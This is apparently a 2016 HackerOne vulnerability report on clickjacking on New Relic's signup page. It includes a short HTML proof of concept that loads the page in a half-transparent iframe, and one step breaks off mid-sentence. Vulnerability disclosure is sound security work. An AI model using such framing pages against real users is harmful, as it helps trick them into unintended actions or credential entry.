New Relic: Clickjacking on authenticated pages which is inscope for New Relic

2016-04-06T07:45:44
ID H1:128645
Type hackerone
Reporter trabajoduro_2
Modified 2016-05-20T23:26:47

Description

Steps to reproduce:

1.Open newrelic site(https://newrelic.com/signup) 2.Put the signup page in clickjacking code <html> <--Report Generated by Clickjacking Test v1.0--> <style> iframe { width: 800px; height: 500px; position: absolute; top: 0; left: 0; filter: alpha(opacity=50); opacity: 0.5; }
</style> <iframe src="https://newrelic.com/signup"> </html> 3.Observe that site is accesible from the iframe through which an attacker can put his own site at the backend to steal the credentials of

Clickjacking attacks trick web users into performing an action they did not intend, typically by rendering an invisible page element on top of the action the user thinks they are performing.

Clickjacking won’t affect your site directly, but it could potentially affect your users. And only you can protect them!